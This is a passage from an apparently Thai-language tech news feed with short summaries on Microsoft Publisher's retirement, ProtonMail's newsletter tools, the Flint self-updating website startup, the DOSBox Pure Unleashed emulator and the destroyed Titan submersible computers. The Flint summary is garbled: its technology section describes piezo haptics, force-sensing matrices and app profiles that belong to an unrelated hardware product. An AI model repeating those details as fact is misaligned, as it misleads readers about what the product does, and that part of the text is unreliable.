    สำหรับผู้ใช้ที่ต้องการทางเลือกใหม่ Microsoft แนะนำให้ใช้ Word, PowerPoint หรือแอป Designer แทน ส่วนทางเลือกจากภายนอกก็มีเช่น:

    Canva — ใช้งานง่าย มีเทมเพลตหลากหลาย แต่ฟีเจอร์เต็มต้องสมัครสมาชิก
    LibreOffice Draw — ฟรีและโอเพ่นซอร์ส รองรับไฟล์ .pub ได้พอสมควร
    Affinity Publisher 2 — ซื้อครั้งเดียว ไม่มีรายเดือน เหมาะกับผู้ใช้จริงจัง

    Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026
    ตรงกับวันหมดอายุของ Office LTSC 2021

    Publisher จะถูกถอดออกจาก Microsoft 365
    ไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีก

    Publisher เปิดตัวในปี 1991 และรวมอยู่ใน Office ตั้งแต่เวอร์ชัน 97
    เคยเป็นเครื่องมือออกแบบยอดนิยมสำหรับผู้ใช้ทั่วไป

    Microsoft แนะนำให้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู
    และเปิด PDF ใน Word หากต้องการแก้ไข

    ทางเลือกใหม่จาก Microsoft ได้แก่ Word, PowerPoint และ Designer
    ใช้แทน Publisher สำหรับงานออกแบบทั่วไป

    ทางเลือกจากภายนอก ได้แก่ Canva, LibreOffice Draw, Affinity Publisher 2
    มีทั้งแบบฟรีและเสียเงินตามระดับความสามารถ

    https://www.slashgear.com/2001386/microsoft-ending-publisher-in-october-2026/
    📄 “Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 — ปิดตำนานเครื่องมือออกแบบยุค 90” — เมื่อแอปสร้างใบปลิวและจดหมายข่าวที่เคยอยู่ในทุกบ้านกำลังจะอำลาอย่างถาวร Microsoft ประกาศว่าจะยุติการสนับสนุนแอป Publisher อย่างเป็นทางการในเดือนตุลาคม 2026 ซึ่งตรงกับวันหมดอายุของ Office LTSC 2021 โดยหลังจากวันนั้น Publisher จะถูกถอดออกจาก Microsoft 365 และไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีกต่อไปในเวอร์ชันใหม่ Publisher เปิดตัวครั้งแรกในปี 1991 เพื่อให้ผู้ใช้ทั่วไปสามารถออกแบบสิ่งพิมพ์ เช่น ใบปลิว, โบรชัวร์, จดหมายข่าว โดยไม่ต้องใช้โปรแกรมระดับมืออาชีพอย่าง QuarkXPress หรือ Adobe InDesign ด้วยราคาที่เข้าถึงได้และการใช้งานง่าย ทำให้ Publisher กลายเป็นเครื่องมือยอดนิยมในโรงเรียน, ธุรกิจขนาดเล็ก และผู้ใช้ตามบ้าน แม้จะไม่เคยครองใจนักออกแบบมืออาชีพ แต่ Publisher ก็มีบทบาทสำคัญในการ “ประชาธิปไตยด้านการออกแบบ” โดยเปิดโอกาสให้ทุกคนสามารถสร้างสื่อสิ่งพิมพ์ได้ด้วยตัวเอง หลังจากการยุติการสนับสนุน Microsoft แนะนำให้ผู้ใช้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู และหากต้องการแก้ไข ให้เปิด PDF ใน Word — แม้ว่าการจัดวางอาจเพี้ยน โดยเฉพาะไฟล์ที่มีกราฟิกจำนวนมาก สำหรับผู้ใช้ที่ต้องการทางเลือกใหม่ Microsoft แนะนำให้ใช้ Word, PowerPoint หรือแอป Designer แทน ส่วนทางเลือกจากภายนอกก็มีเช่น: 📐 Canva — ใช้งานง่าย มีเทมเพลตหลากหลาย แต่ฟีเจอร์เต็มต้องสมัครสมาชิก 📐 LibreOffice Draw — ฟรีและโอเพ่นซอร์ส รองรับไฟล์ .pub ได้พอสมควร 📐 Affinity Publisher 2 — ซื้อครั้งเดียว ไม่มีรายเดือน เหมาะกับผู้ใช้จริงจัง ✅ Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 ➡️ ตรงกับวันหมดอายุของ Office LTSC 2021 ✅ Publisher จะถูกถอดออกจาก Microsoft 365 ➡️ ไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีก ✅ Publisher เปิดตัวในปี 1991 และรวมอยู่ใน Office ตั้งแต่เวอร์ชัน 97 ➡️ เคยเป็นเครื่องมือออกแบบยอดนิยมสำหรับผู้ใช้ทั่วไป ✅ Microsoft แนะนำให้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู ➡️ และเปิด PDF ใน Word หากต้องการแก้ไข ✅ ทางเลือกใหม่จาก Microsoft ได้แก่ Word, PowerPoint และ Designer ➡️ ใช้แทน Publisher สำหรับงานออกแบบทั่วไป ✅ ทางเลือกจากภายนอก ได้แก่ Canva, LibreOffice Draw, Affinity Publisher 2 ➡️ มีทั้งแบบฟรีและเสียเงินตามระดับความสามารถ https://www.slashgear.com/2001386/microsoft-ending-publisher-in-october-2026/
    WWW.SLASHGEAR.COM
    Microsoft Will Be Ending Support For This Popular Software In October 2026 - SlashGear
    Microsoft Publisher will reach end-of-support in October 2026 -- Microsoft will drop updates and remove it from Microsoft 365 apps.
    0 ความคิดเห็น 0 การแบ่งปัน 100 มุมมอง 0 รีวิว
  • “ProtonMail จัดการอีเมลข่าวสารได้ดีกว่า Gmail — สะดวกกว่า ลึกกว่า และเป็นส่วนตัวมากกว่า” — เมื่อการจัดการ newsletter ไม่ใช่แค่การกด unsubscribe แต่คือการควบคุมข้อมูลของคุณ

    บทความจาก It’s FOSS โดย Abhishek เล่าประสบการณ์ตรงจากการใช้ ProtonMail มานานกว่า 5 ปี โดยเปรียบเทียบฟีเจอร์จัดการอีเมลข่าวสาร (newsletter) ระหว่าง ProtonMail กับ Gmail ซึ่งแม้ทั้งสองจะมีฟีเจอร์คล้ายกัน แต่ ProtonMail กลับทำได้ดีกว่าในหลายด้าน

    ใน Gmail ผู้ใช้สามารถเข้าไปที่ “Manage subscriptions” เพื่อดูรายชื่อผู้ส่งและกด unsubscribe ได้ แต่ข้อมูลที่แสดงค่อนข้างจำกัด เช่น จำนวนอีเมลที่ได้รับโดยประมาณ และไม่มีตัวเลือกเพิ่มเติมสำหรับจัดการอีเมลเก่า

    ProtonMail นำเสนอฟีเจอร์เดียวกันในตำแหน่งที่เข้าถึงง่ายกว่า และแสดงข้อมูลละเอียดกว่า เช่น จำนวนอีเมลที่ได้รับในเดือนล่าสุด และจำนวนที่ยังไม่ได้อ่าน พร้อมตัวเลือกจัดการอีเมลเก่า เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ทั้งหมด

    ที่สำคัญคือ ProtonMail ให้ผู้ใช้เลือกได้ว่าจะ “บล็อก” ผู้ส่งหรือแค่ “เลิกติดตาม” ซึ่งต่างกันมาก — การบล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ในขณะที่การเลิกติดตามจะหยุดเฉพาะอีเมลข่าวสารเท่านั้น

    ProtonMail ยังมีระบบ “จัดการแบบอัตโนมัติ” เช่น การย้ายอีเมลไปยังโฟลเดอร์เฉพาะ และการจัดเรียงตามความถี่หรือการอ่าน เพื่อช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเก็บหรือเลิกติดตามอีเมลใด

    ProtonMail มีฟีเจอร์จัดการ newsletter ที่เข้าถึงง่ายกว่า Gmail
    อยู่ในเมนู “Views” โดยไม่ต้องคลิก “More” เหมือน Gmail

    แสดงข้อมูลละเอียด เช่น จำนวนอีเมลที่ได้รับและยังไม่ได้อ่าน
    ช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเลิกติดตามหรือไม่

    มีตัวเลือกจัดการอีเมลเก่าเมื่อกด unsubscribe
    เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว”

    แยกการ “เลิกติดตาม” กับ “บล็อก” ผู้ส่งอย่างชัดเจน
    บล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น

    สามารถย้ายอีเมลไปยังโฟลเดอร์เฉพาะและใช้กับอีเมลในอนาคต
    คลิก “Apply to future messages” เพื่อจัดการอัตโนมัติ

    มีระบบจัดเรียง newsletter ตามความถี่และการอ่าน
    เช่น มากที่สุด/น้อยที่สุด, อ่านล่าสุด, ได้รับล่าสุด

    ฟีเจอร์นี้มีในเวอร์ชันฟรีของ ProtonMail ด้วย
    ไม่จำเป็นต้องจ่ายเพื่อใช้งานพื้นฐาน

    https://news.itsfoss.com/protonmail-gmail-better-newsletter/
    📩 “ProtonMail จัดการอีเมลข่าวสารได้ดีกว่า Gmail — สะดวกกว่า ลึกกว่า และเป็นส่วนตัวมากกว่า” — เมื่อการจัดการ newsletter ไม่ใช่แค่การกด unsubscribe แต่คือการควบคุมข้อมูลของคุณ บทความจาก It’s FOSS โดย Abhishek เล่าประสบการณ์ตรงจากการใช้ ProtonMail มานานกว่า 5 ปี โดยเปรียบเทียบฟีเจอร์จัดการอีเมลข่าวสาร (newsletter) ระหว่าง ProtonMail กับ Gmail ซึ่งแม้ทั้งสองจะมีฟีเจอร์คล้ายกัน แต่ ProtonMail กลับทำได้ดีกว่าในหลายด้าน ใน Gmail ผู้ใช้สามารถเข้าไปที่ “Manage subscriptions” เพื่อดูรายชื่อผู้ส่งและกด unsubscribe ได้ แต่ข้อมูลที่แสดงค่อนข้างจำกัด เช่น จำนวนอีเมลที่ได้รับโดยประมาณ และไม่มีตัวเลือกเพิ่มเติมสำหรับจัดการอีเมลเก่า ProtonMail นำเสนอฟีเจอร์เดียวกันในตำแหน่งที่เข้าถึงง่ายกว่า และแสดงข้อมูลละเอียดกว่า เช่น จำนวนอีเมลที่ได้รับในเดือนล่าสุด และจำนวนที่ยังไม่ได้อ่าน พร้อมตัวเลือกจัดการอีเมลเก่า เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ทั้งหมด ที่สำคัญคือ ProtonMail ให้ผู้ใช้เลือกได้ว่าจะ “บล็อก” ผู้ส่งหรือแค่ “เลิกติดตาม” ซึ่งต่างกันมาก — การบล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ในขณะที่การเลิกติดตามจะหยุดเฉพาะอีเมลข่าวสารเท่านั้น ProtonMail ยังมีระบบ “จัดการแบบอัตโนมัติ” เช่น การย้ายอีเมลไปยังโฟลเดอร์เฉพาะ และการจัดเรียงตามความถี่หรือการอ่าน เพื่อช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเก็บหรือเลิกติดตามอีเมลใด ✅ ProtonMail มีฟีเจอร์จัดการ newsletter ที่เข้าถึงง่ายกว่า Gmail ➡️ อยู่ในเมนู “Views” โดยไม่ต้องคลิก “More” เหมือน Gmail ✅ แสดงข้อมูลละเอียด เช่น จำนวนอีเมลที่ได้รับและยังไม่ได้อ่าน ➡️ ช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเลิกติดตามหรือไม่ ✅ มีตัวเลือกจัดการอีเมลเก่าเมื่อกด unsubscribe ➡️ เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ✅ แยกการ “เลิกติดตาม” กับ “บล็อก” ผู้ส่งอย่างชัดเจน ➡️ บล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ✅ สามารถย้ายอีเมลไปยังโฟลเดอร์เฉพาะและใช้กับอีเมลในอนาคต ➡️ คลิก “Apply to future messages” เพื่อจัดการอัตโนมัติ ✅ มีระบบจัดเรียง newsletter ตามความถี่และการอ่าน ➡️ เช่น มากที่สุด/น้อยที่สุด, อ่านล่าสุด, ได้รับล่าสุด ✅ ฟีเจอร์นี้มีในเวอร์ชันฟรีของ ProtonMail ด้วย ➡️ ไม่จำเป็นต้องจ่ายเพื่อใช้งานพื้นฐาน https://news.itsfoss.com/protonmail-gmail-better-newsletter/
    NEWS.ITSFOSS.COM
    That One (of the several) Feature ProtonMail Does Better Than Gmail
    The newsletters can be a mess to manage. ProtonMail gives you better features than Gmail to manage your newsletter subscriptions.
    0 ความคิดเห็น 0 การแบ่งปัน 60 มุมมอง 0 รีวิว
  • “Flint เปิดตัวเว็บไซต์อัตโนมัติ—สร้างเนื้อหาและปรับแต่งตัวเองโดยไม่ต้องมีมนุษย์”

    ลองจินตนาการว่าเว็บไซต์ของคุณสามารถสร้างหน้าใหม่ ปรับแต่งดีไซน์ และเพิ่มประสิทธิภาพ SEO ได้เองโดยไม่ต้องมีทีมงาน—นี่คือแนวคิดของ Flint สตาร์ทอัพที่เพิ่งเปิดตัวแพลตฟอร์มสร้างเว็บไซต์อัตโนมัติเต็มรูปแบบ โดยใช้ AI เป็นแกนกลางในการจัดการทุกอย่าง ตั้งแต่การออกแบบไปจนถึงการเผยแพร่

    ผู้ใช้เพียงแค่อัปโหลด content brief และลิงก์เว็บไซต์เดิม Flint จะวิเคราะห์ดีไซน์ของแบรนด์ แล้วสร้างหน้าเว็บใหม่ที่พร้อมใช้งานทันทีบนโดเมนจริง โดยไม่ต้องเขียนโค้ดหรือจัดการ CMS ใด ๆ

    Flint ได้รับเงินลงทุน $5 ล้านจาก Accel, Sheryl Sandberg’s venture fund และ Neo เพื่อขยายการพัฒนา AI และระบบออกแบบอัตโนมัติ พร้อมเปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว

    แนวคิดของ Flint
    สร้างเว็บไซต์ที่สามารถอัปเดตและปรับแต่งตัวเองโดยอัตโนมัติ
    ใช้ AI วิเคราะห์ดีไซน์และเนื้อหาเพื่อสร้างหน้าเว็บใหม่
    ไม่ต้องเขียนโค้ดหรือใช้ CMS

    วิธีการทำงาน
    ผู้ใช้ส่ง content brief และลิงก์เว็บไซต์เดิม
    Flint สร้างหน้าเปรียบเทียบ, landing page และ SEO content
    เผยแพร่หน้าเว็บโดยตรงบนโดเมนของผู้ใช้

    เทคโนโลยีเบื้องหลัง
    ใช้ระบบ piezo haptic และ force sensing matrix สำหรับ UX
    รองรับ deep-click zones และ gesture เฉพาะแอป
    มีโปรไฟล์สำเร็จรูปสำหรับแอปยอดนิยม เช่น Photoshop, Office, Figma

    การลงทุนและการเปิดตัว
    ได้รับเงินลงทุน $5 ล้านจาก Accel และ Sheryl Sandberg
    เปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว
    มีแผนขยายไปยังระบบ AI-driven design engineering

    คำเตือนและข้อจำกัด
    ข้อมูล SEO และ conversion ยังมาจากการรายงานภายในของบริษัท
    ยังไม่มีการเปิดเผยว่า Google จะจัดอันดับเว็บไซต์ที่ปรับตัวเองอย่างไร
    ความโปร่งใสและการควบคุมอาจเป็นประเด็นในระบบอัตโนมัติเต็มรูปแบบ

    https://www.techradar.com/pro/new-startup-wants-to-build-self-updating-autonomous-websites-that-generate-content-and-optimize-themselves-without-human-intervention-i-wonder-what-google-will-make-of-this
    🌐 “Flint เปิดตัวเว็บไซต์อัตโนมัติ—สร้างเนื้อหาและปรับแต่งตัวเองโดยไม่ต้องมีมนุษย์” ลองจินตนาการว่าเว็บไซต์ของคุณสามารถสร้างหน้าใหม่ ปรับแต่งดีไซน์ และเพิ่มประสิทธิภาพ SEO ได้เองโดยไม่ต้องมีทีมงาน—นี่คือแนวคิดของ Flint สตาร์ทอัพที่เพิ่งเปิดตัวแพลตฟอร์มสร้างเว็บไซต์อัตโนมัติเต็มรูปแบบ โดยใช้ AI เป็นแกนกลางในการจัดการทุกอย่าง ตั้งแต่การออกแบบไปจนถึงการเผยแพร่ ผู้ใช้เพียงแค่อัปโหลด content brief และลิงก์เว็บไซต์เดิม Flint จะวิเคราะห์ดีไซน์ของแบรนด์ แล้วสร้างหน้าเว็บใหม่ที่พร้อมใช้งานทันทีบนโดเมนจริง โดยไม่ต้องเขียนโค้ดหรือจัดการ CMS ใด ๆ Flint ได้รับเงินลงทุน $5 ล้านจาก Accel, Sheryl Sandberg’s venture fund และ Neo เพื่อขยายการพัฒนา AI และระบบออกแบบอัตโนมัติ พร้อมเปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว ✅ แนวคิดของ Flint ➡️ สร้างเว็บไซต์ที่สามารถอัปเดตและปรับแต่งตัวเองโดยอัตโนมัติ ➡️ ใช้ AI วิเคราะห์ดีไซน์และเนื้อหาเพื่อสร้างหน้าเว็บใหม่ ➡️ ไม่ต้องเขียนโค้ดหรือใช้ CMS ✅ วิธีการทำงาน ➡️ ผู้ใช้ส่ง content brief และลิงก์เว็บไซต์เดิม ➡️ Flint สร้างหน้าเปรียบเทียบ, landing page และ SEO content ➡️ เผยแพร่หน้าเว็บโดยตรงบนโดเมนของผู้ใช้ ✅ เทคโนโลยีเบื้องหลัง ➡️ ใช้ระบบ piezo haptic และ force sensing matrix สำหรับ UX ➡️ รองรับ deep-click zones และ gesture เฉพาะแอป ➡️ มีโปรไฟล์สำเร็จรูปสำหรับแอปยอดนิยม เช่น Photoshop, Office, Figma ✅ การลงทุนและการเปิดตัว ➡️ ได้รับเงินลงทุน $5 ล้านจาก Accel และ Sheryl Sandberg ➡️ เปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว ➡️ มีแผนขยายไปยังระบบ AI-driven design engineering ‼️ คำเตือนและข้อจำกัด ⛔ ข้อมูล SEO และ conversion ยังมาจากการรายงานภายในของบริษัท ⛔ ยังไม่มีการเปิดเผยว่า Google จะจัดอันดับเว็บไซต์ที่ปรับตัวเองอย่างไร ⛔ ความโปร่งใสและการควบคุมอาจเป็นประเด็นในระบบอัตโนมัติเต็มรูปแบบ https://www.techradar.com/pro/new-startup-wants-to-build-self-updating-autonomous-websites-that-generate-content-and-optimize-themselves-without-human-intervention-i-wonder-what-google-will-make-of-this
    WWW.TECHRADAR.COM
    Websites that build and fix themselves may soon flood Google
    AI-driven system promises to turn websites into self-updating digital agents
    0 ความคิดเห็น 0 การแบ่งปัน 160 มุมมอง 0 รีวิว
  • "DOSBox Pure Unleashed: อีมูเลเตอร์ยุคใหม่ที่ปลดล็อกความคลาสสิกของเกม DOS"

    หลังจากใช้เวลาพัฒนานานถึง 5 ปี Psyraven ได้เปิดตัว DOSBox Pure Unleashed อย่างเป็นทางการ—เวอร์ชันใหม่ของอีมูเลเตอร์ DOS ที่ไม่ต้องพึ่ง RetroArch อีกต่อไป และพร้อมใช้งานแบบ standalone บน Windows, macOS และ Linux

    เวอร์ชันใหม่นี้มาพร้อม UI ที่ใช้งานง่าย และฟีเจอร์ล้ำ ๆ ที่ตอบโจทย์นักเล่นเกม retro โดยเฉพาะ เช่น การรันเกมจากไฟล์ ZIP โดยไม่ต้องติดตั้ง OS, รองรับกราฟิก Voodoo สูงสุดถึง 4K, การใช้ MIDI synth และ SoundFonts, รวมถึงระบบ save state และการตั้งค่าคอนโทรลเลอร์แบบอัตโนมัติ

    ที่สำคัญคือการรองรับเกม Windows 9X แบบทดลอง ซึ่งเป็นก้าวสำคัญในการขยายขอบเขตของอีมูเลเตอร์ DOS ไปสู่ยุค Windows รุ่นเก่า

    จุดเด่นของ DOSBox Pure Unleashed
    เป็นเวอร์ชัน standalone ไม่ต้องใช้ RetroArch
    รองรับ Windows, macOS และ Linux
    UI ใช้งานง่าย แบ่งหมวดหมู่ชัดเจน
    รันเกมจาก ZIP ได้ทันที ไม่ต้องติดตั้ง OS

    ฟีเจอร์ใหม่ที่น่าสนใจ
    รองรับ Voodoo graphics สูงสุด 4K/UHD
    ใช้ MIDI synth และ SoundFonts ได้
    มีระบบ save state และ shared system shells
    รองรับการตั้งค่าคอนโทรลเลอร์อัตโนมัติ
    มี on-screen keyboard และ mouse/joystick emulation

    ความสามารถเพิ่มเติม
    รองรับ Windows 9X แบบทดลอง
    มีฟีเจอร์ auto-start และ advanced OS install options
    มี CRT filters สำหรับภาพแบบยุคเก่า
    รองรับ MT-32 และ SoundFont playback

    คำเตือนในการใช้งาน
    ฟีเจอร์ Windows 9X ยังอยู่ในขั้นทดลอง อาจไม่เสถียร
    การตั้งค่าขั้นสูงอาจต้องใช้ความรู้ด้านเทคนิค
    ไม่เหมาะสำหรับผู้ใช้ทั่วไปที่ต้องการ “คลิกแล้วเล่น” แบบง่าย ๆ

    การสนับสนุนและชุมชน
    มี Discord สำหรับพูดคุยและแลกเปลี่ยนเทคนิค
    ดาวน์โหลดฟรี ขนาดไฟล์เล็ก ~1.5MB
    ผู้พัฒนาหวังรับ “ทิป” ผ่านหน้า Itch.io

    สาระเพิ่มเติมจากภายนอก:
    ความสำคัญของ DOSBox ในวงการเกม retro
    เป็นเครื่องมือหลักในการเล่นเกม DOS บนระบบปฏิบัติการยุคใหม่
    ช่วยอนุรักษ์เกมเก่าและประสบการณ์การเล่นแบบดั้งเดิม

    แนวโน้มของอีมูเลเตอร์ยุคใหม่
    เน้นความง่ายในการใช้งานและความแม่นยำในการจำลอง
    รองรับกราฟิกและเสียงระดับสูงเพื่อประสบการณ์ที่สมจริง

    https://www.tomshardware.com/video-games/retro-gaming/dosbox-pure-unleashed-is-ready-for-windows-mac-and-linux-computers-after-five-years-in-development-enhanced-standalone-release-no-longer-restricted-to-being-a-retroarch-core
    🎮 "DOSBox Pure Unleashed: อีมูเลเตอร์ยุคใหม่ที่ปลดล็อกความคลาสสิกของเกม DOS" หลังจากใช้เวลาพัฒนานานถึง 5 ปี Psyraven ได้เปิดตัว DOSBox Pure Unleashed อย่างเป็นทางการ—เวอร์ชันใหม่ของอีมูเลเตอร์ DOS ที่ไม่ต้องพึ่ง RetroArch อีกต่อไป และพร้อมใช้งานแบบ standalone บน Windows, macOS และ Linux เวอร์ชันใหม่นี้มาพร้อม UI ที่ใช้งานง่าย และฟีเจอร์ล้ำ ๆ ที่ตอบโจทย์นักเล่นเกม retro โดยเฉพาะ เช่น การรันเกมจากไฟล์ ZIP โดยไม่ต้องติดตั้ง OS, รองรับกราฟิก Voodoo สูงสุดถึง 4K, การใช้ MIDI synth และ SoundFonts, รวมถึงระบบ save state และการตั้งค่าคอนโทรลเลอร์แบบอัตโนมัติ ที่สำคัญคือการรองรับเกม Windows 9X แบบทดลอง ซึ่งเป็นก้าวสำคัญในการขยายขอบเขตของอีมูเลเตอร์ DOS ไปสู่ยุค Windows รุ่นเก่า ✅ จุดเด่นของ DOSBox Pure Unleashed ➡️ เป็นเวอร์ชัน standalone ไม่ต้องใช้ RetroArch ➡️ รองรับ Windows, macOS และ Linux ➡️ UI ใช้งานง่าย แบ่งหมวดหมู่ชัดเจน ➡️ รันเกมจาก ZIP ได้ทันที ไม่ต้องติดตั้ง OS ✅ ฟีเจอร์ใหม่ที่น่าสนใจ ➡️ รองรับ Voodoo graphics สูงสุด 4K/UHD ➡️ ใช้ MIDI synth และ SoundFonts ได้ ➡️ มีระบบ save state และ shared system shells ➡️ รองรับการตั้งค่าคอนโทรลเลอร์อัตโนมัติ ➡️ มี on-screen keyboard และ mouse/joystick emulation ✅ ความสามารถเพิ่มเติม ➡️ รองรับ Windows 9X แบบทดลอง ➡️ มีฟีเจอร์ auto-start และ advanced OS install options ➡️ มี CRT filters สำหรับภาพแบบยุคเก่า ➡️ รองรับ MT-32 และ SoundFont playback ‼️ คำเตือนในการใช้งาน ⛔ ฟีเจอร์ Windows 9X ยังอยู่ในขั้นทดลอง อาจไม่เสถียร ⛔ การตั้งค่าขั้นสูงอาจต้องใช้ความรู้ด้านเทคนิค ⛔ ไม่เหมาะสำหรับผู้ใช้ทั่วไปที่ต้องการ “คลิกแล้วเล่น” แบบง่าย ๆ ✅ การสนับสนุนและชุมชน ➡️ มี Discord สำหรับพูดคุยและแลกเปลี่ยนเทคนิค ➡️ ดาวน์โหลดฟรี ขนาดไฟล์เล็ก ~1.5MB ➡️ ผู้พัฒนาหวังรับ “ทิป” ผ่านหน้า Itch.io 📎 สาระเพิ่มเติมจากภายนอก: ✅ ความสำคัญของ DOSBox ในวงการเกม retro ➡️ เป็นเครื่องมือหลักในการเล่นเกม DOS บนระบบปฏิบัติการยุคใหม่ ➡️ ช่วยอนุรักษ์เกมเก่าและประสบการณ์การเล่นแบบดั้งเดิม ✅ แนวโน้มของอีมูเลเตอร์ยุคใหม่ ➡️ เน้นความง่ายในการใช้งานและความแม่นยำในการจำลอง ➡️ รองรับกราฟิกและเสียงระดับสูงเพื่อประสบการณ์ที่สมจริง https://www.tomshardware.com/video-games/retro-gaming/dosbox-pure-unleashed-is-ready-for-windows-mac-and-linux-computers-after-five-years-in-development-enhanced-standalone-release-no-longer-restricted-to-being-a-retroarch-core
    0 ความคิดเห็น 0 การแบ่งปัน 121 มุมมอง 0 รีวิว
  • "ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก"

    หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม

    ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน

    แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้

    สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์
    พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม
    ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก
    กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น

    การสแกนและกู้ข้อมูล
    ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด
    ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้
    หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย

    การวิเคราะห์โดย ATF
    แยกแผง SSD ได้ 2 แผงจากซากโลหะ
    พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว
    ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ

    คำเตือนจากการออกแบบระบบ
    การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด
    ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด
    การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ

    สาระเพิ่มเติมจากภายนอก:
    ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย
    SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก
    การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND

    บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ
    ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง
    ใช้วัสดุที่ทนแรงดันและความร้อนสูง
    ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย

    https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too
    🥶 "ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก" หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ 